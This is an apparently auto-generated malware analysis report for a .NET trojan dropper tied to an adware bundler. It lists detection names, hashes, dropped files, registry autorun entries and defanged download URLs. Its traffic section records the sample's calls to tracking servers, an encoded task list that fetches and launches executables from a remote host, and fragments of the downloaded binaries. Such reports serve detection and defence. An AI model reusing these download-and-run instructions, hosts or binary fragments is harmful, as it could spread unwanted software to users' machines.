Trojan.MSIL.Agent.COX_ab576cd404
Trojan.MSIL.Agent.COX (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.7345 (DrWeb), GenericRXBY-VX!AB576CD404F5 (McAfee), Trojan.Gen (Symantec), Trojan.MSIL.Agent.COX (FSecure), Win32:Dropper-gen [Drp] (AVG), Win32:Dropper-gen [Drp] (Avast), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: ab576cd404f53426599c8b5fb1a30ae9
SHA1: 577fbfd73fe0e069e1736614809e29dc2caa47bf
SHA256: 92861cc91f72148f54885852a189a238978d007628d9b0a74b8454cfda0e0bda
SSDeep: 1536:NQORufiOW2Uip5Eb8LK8jm3ChiZ2xTuVVGQF:NQORufiVtS5Eb8LK8jqChiZoqVVTF
Size: 53248 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-12 18:20:22
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
SecondL.exe:1692
Sho9libi.exe:1764
OneTwo.exe:2320
%original file name%.exe:3424
The Trojan injects its code into the following process(es):
%original file name%.exe:3492
KRH6BP3WS.exe:548
is4p1fniere.exe:2072
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe (204 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
The process Sho9libi.exe:1764 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1764.343685 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1764.343685 (0 bytes)
The process OneTwo.exe:2320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\KRH6BP3WSZ\uninstaller.exe.config (1 bytes)
%Program Files%\KRH6BP3WSZ\uninstaller.exe (29599 bytes)
%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe (124075 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2320.341361 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2320.341361 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2320.341361 (0 bytes)
The process %original file name%.exe:3492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe (17797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe (1117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe (230392 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe.config (1 bytes)
The process KRH6BP3WS.exe:548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\KRH6BP3WSZ\cast.config (37 bytes)
Registry activity
The process SecondL.exe:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process Sho9libi.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process OneTwo.exe:2320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\ab576cd404f53426599c8b5fb1a30ae9_RASMANCS]
"EnableFileTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_R2ZKP" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process KRH6BP3WS.exe:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\KRH6BP3WS_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HDURM51XOVAKJHF" = "%Program Files%\KRH6BP3WSZ\KRH6BP3WS.exe"
The process is4p1fniere.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"4ffk2bt3ky1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| 2379b7c1da53357ea4ca529d85510aae | c:\Program Files\KRH6BP3WSZ\KRH6BP3WS.exe |
| b837412325a20d6b0e3d52e584d21541 | c:\Program Files\KRH6BP3WSZ\uninstaller.exe |
| 0357be320d39ee6b2192dfa86eaa9bbd | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\OneTwo.exe |
| 53b9881ed1f83f7160f8bcfab76c44f3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\SecondL.exe |
| a9df6632b06facd1f079fa234731b22e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0UPP3DK5O7\Sho9libi.exe |
| 4d10a4b718cfbe93311ec4b90e2cb8b0 | c:\Users\"%CurrentUserName%"\AppData\Roaming\3ma3tvo2xkd\is4p1fniere.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name:
Product Name: C6KAT
Product Version: 1.2.4.0
Legal Copyright: Copyright (c) 1726
Legal Trademarks:
Original Filename: dowsFormsApplication.exe
Internal Name: dowsFormsApplication.exe
File Version: 1.2.4.0
File Description: C
Comments: C6KATBJND
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 47548 | 47616 | 4.30641 | 8c345a9e24fc5137d123342e21f04db6 |
| .rsrc | 57344 | 4492 | 4608 | 3.50605 | 9c8fa6e6055c2fb2d415a2507466b49f |
| .reloc | 65536 | 12 | 512 | 0.056519 | 263e40833b941676dc3e5caee2e92c8f |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://nihamatioto.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://nihamatioto.com/3/000000/wizzcaster_installer_v2.exe | |
| hxxp://nihamatioto.com/exe/updater.exe | |
| hxxp://nihamatioto.com/safe_download/582369/AdsShow.exe | |
| hxxp://nihamatioto.com/download/3/wizzcaster_v2.exe | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://nihamatioto.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://www.wizzmonetize.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://wizzcaster.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=21uu3dq3e0qp2kofrf0me7i597; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}....
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=la2m4a3g8dm9c99n91i8ob7iv1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}..
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:40 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=21jjjadttjeee2jf749j186tp0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8PHVwZGF0ZXMgcmVmcmVzaD0iMTIwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IlNlY29uZEwiIHZhbHVlPSJodHRwOi8vbmloYW1hdGlvdG8uY29tL2Zy
b21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIH
NvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9
IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxNzA3MjgiLz4NCg0KPC9wZXJmb3Jt
Pg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbmUiIH
ZhbHVlPSI0NTE3MDcyOCIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwv
dGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd28iIH
ZhbHVlPSJodHRwOi8vbmloYW1hdGlvdG8uY29tLzMvMDAwMDAwL3dpenpjYXN0ZXJfaW5z
dGFsbGVyX3YyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQ
o8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0iT25lVHdvIiB2YWx1ZT0ibm90d2FpdCIg
cGFyYW1zPSI1N2E3NjRkMDQyYmY4Ii8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iSGFoYS
IgdmFsdWU9IjAwMDE3MDcyOCIvPg0KDQo8L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0K
DQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJIYWhhIiB2YWx1ZT0iMTcwNzI4IiBtYXRjaD
0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90YXNrPjx0YXNrPg0KDQo8cGVyZm9y
bT4NCg0KPGRvd25sb2FkIG5hbWU9IlNobzlsaWJpIiB2YWx1ZT0iaHR0cDovL25paGFtYX
Rpb3RvLmNvbS9leGUvdXBkYXRlci5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5l
dD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IlNobzlsaWJpIiB2YW
x1ZT0id2FpdCIgcGFyYW1zPSJ3ZSIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbWU9IkRhdGUi
IHZhbHVlPSJmZThmMTcwNzI4Ii8 DQoNCjwvcGVyZm9ybT4NCg0KPGNvbmRpdGlvbnM DQ
oNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9IkRhdGUiIHZhbHVlPSIxNzA3MjgiIG1h<<< skipped >>>
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: nihamatioto.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:47 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownloadfe200..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...!.{Y.........."...0.................. ........@.. .................
......@............@.................................L...O.......8....
................ .....................................................
.. ............... ..H............text........ ......................
..`.rsrc...8...........................@..@.reloc....... .............
.........@..B........................H.......L#..@............2.......
........................................0..j.......(.....(..... ......
..(......~....o..........o..........o........ ....o........o...... ...
.. ....o........o........!....o........o........"....o........o......(
.......(....o......%...%..,.o......(.....o........o......(.......(....
o......%...%..,.o......(.....o........~....o............o....t........
.o........o ...(!.....(............io"...o....(.....(......&..*..A....
.......f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[.
.p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($..
...o%...r...po......o&...t'..........%...o....&*....0..S.........&....
('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%............
.....*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~...
.*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l....
...#~..8...$...#Strings....\...<...#US.........#GUID...........#Blo
b...........W..........3........,...................1.............<<< skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: nihamatioto.com
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload4da00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...".{Y.........."...0.............v.... ........@.. .................
......@............@.................................$...O.......d....
................ .....................................................
.. ............... ..H............text...|.... ......................
..`.rsrc...d...........................@..@.reloc....... .............
.........@..B................X.......H.......L#..@............2..`....
........................................0..j.......(.....(..... ......
..(......~....o..........o..........o........ ....o........o...... ...
.. ....o........o........!....o........o........"....o........o......(
.......(....o......%...%..,.o......(.....o........o......(.......(....
o......%...%..,.o......(.....o........~....o............o....t........
.o........o ...(!.....(............io"...o....(.....(......&..*..A....
.......f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[.
.p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($..
...o%...r...po......o&...t'..........%...o....&*....0..S.........&....
('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%............
.....*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~...
.*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l....
...#~..8...$...#Strings....\...<...#US.........#GUID...........#Blo
b...........W..........3........,...................1.............<<< skipped >>>
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: nihamatioto.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:43 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload2800..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
....{Y.........."...0..............;... ...@....@.. ..................
..................@.................................x;..O....@..T.....
...............`......@:..............................................
. ............... ..H............text........ ...................... .
.`.rsrc...T....@......................@..@.reloc.......`.......&......
........@..B.................;......H........"...............9........
......................................Zs....r...ps.....o....*..(....*.
.0............(....(....rq..pru..po....(....%(....&(....rq..pru..po...
.rw..p(....(....... ... ....1...... ....3..&...X.... X...2...X.. ....
2..(....(...........%.r...p.%.r...p.%.r...p.%.r]..p.%.r...p.%.r...p.%.
r...p.%.r...p.%.ru..p.%..r...p.%..r...p.%..rZ..p.%..r...p.%..r...p.%..
ra..p.%..r...p.%..r...p.%..r...p.%..r...p.%..r'..p.%..rA..p.%..r_..p.%
..r}..p.%..r...p.%..r...p.%..r/..p.(......rQ..p(.....(......,.....( ..
.& ..ru..p( ...&..&..*..A............................~....-.ra..p.....
(!...o"...s#........~....*.~....*.......*.~....*..($...*Vs....(%...t..
.......*BSJB............v2.0.50727......l.......#~......d...#Strings..
..........#US.........#GUID.......$...#Blob...........W..........3....
....'...................%.............................................
../...........c.....s.......[.....[.....[.....[...O.[...h.[.....[.....
....!.......[...............m...../.....F.............*...w.F.....<<< skipped >>>
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: nihamatioto.com
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:43 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload54c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...!.{Y.........."...0..6..........NU... ...`....@.. .................
...................@..................................T..O....`..d....
........................S.............................................
.. ............... ..H............text...T5... ...6..................
..`.rsrc...d....`.......8..............@..@.reloc...............J.....
.........@..B................0U......H.......L#..@............2..8!...
........................................0..j.......(.....(..... ......
..(......~....o..........o..........o........ ....o........o...... ...
.. ....o........o........!....o........o........"....o........o......(
.......(....o......%...%..,.o......(.....o........o......(.......(....
o......%...%..,.o......(.....o........~....o............o....t........
.o........o ...(!.....(............io"...o....(.....(......&..*..A....
.......f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[.
.p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($..
...o%...r...po......o&...t'..........%...o....&*....0..S.........&....
('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%............
.....*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~...
.*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l....
...#~..8...$...#Strings....\...<...#US.........#GUID...........#Blo
b...........W..........3........,...................1.............<<< skipped >>>
GET /exe/updater.exe HTTP/1.1
Host: nihamatioto.com
HTTP/1.1 200 OK
Date: Fri, 28 Jul 2017 11:59:44 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload20f000..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....{Y.........."...0... ........... .. ....!...@.. ................
.......@!...........@.................................|. .O.....!.d...
................. !.....D. ...........................................
... ............... ..H............text..... .. .... .................
..`.rsrc...d.....!....... .............@..@.reloc....... !....... ...
..........@..B.................. .....H.......L#..@............2.... .
.........................................0..j.......(.....(..... .....
...(......~....o..........o..........o........ ....o........o...... ..
... ....o........o........!....o........o........"....o........o......
(.......(....o......%...%..,.o......(.....o........o......(.......(...
.o......%...%..,.o......(.....o........~....o............o....t.......
..o........o ...(!.....(............io"...o....(.....(......&..*..A...
........f...f.............(#...*..(....*.0..G.........&...%.r...p.%.r[
..p.%.rk..p.%.r...p.%.r...p.%.r...p.%.r...p.%.r...p.*..0..5........($.
....o%...r...po......o&...t'..........%...o....&*....0..S.........&...
.('...r...po(.....s)...%o*.....o ...o,......%...%.._.o....%...........
......*.~....-.r...p.....(-...o....s/........~....*.~....*.......*.~..
..*..(0...*Vs....(1...t.........*.BSJB............v2.0.50727......l...
....#~..8...$...#Strings....\...<...#US.........#GUID...........#Bl
ob...........W..........3........,...................1............<<< skipped >>>
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: nihamatioto.com
Connection: Keep-Alive
HTTP/1.1 200 OK
